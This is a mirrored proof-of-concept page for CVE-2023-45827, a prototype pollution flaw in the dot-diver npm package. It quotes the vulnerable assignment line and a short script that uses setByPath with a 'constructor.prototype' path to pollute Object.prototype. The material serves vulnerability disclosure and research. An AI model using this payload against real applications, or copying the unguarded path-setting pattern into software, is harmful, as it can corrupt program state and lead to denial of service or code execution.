CVE-2023-45827 PoC — Dot diver 安全漏洞

Source

https://github.com/200101WhoAmI/CVE-2023-45827

Associated Vulnerability

Title:Dot diver 安全漏洞 (CVE-2023-45827)
Description:Dot diver是一个轻量级、功能强大且无依赖的 TypeScript 实用程序库，提供用于处理点表示法中的对象路径的类型和函数。 Dot diver 1.0.2之前版本存在安全漏洞。攻击者利用该漏洞可以远程执行代码。

Description

pp

Readme

# CVE-2023-45827



## 취약점 개요

- CVE-2023-45827

- CVSS : 9.8

- Nov 3, 2023

- ProtoType Pollution in node.js package

- rebob 프로젝트의 일환

## 취약점 설명

[github advisories](https://github.com/clickbar/dot-diver/security/advisories/GHSA-9w5f-mw3p-pj47)

This is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.


**vulnerable code**

```
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
//eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value
```
**poc**

```
import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo
```

It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.


[target package](https://www.npmjs.com/package/@clickbar/dot-diver)

File Snapshot


 [4.0K]  /data/pocs/2be00be074107770cc8e250c2af6d5c8dade646e
└── [ 902]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!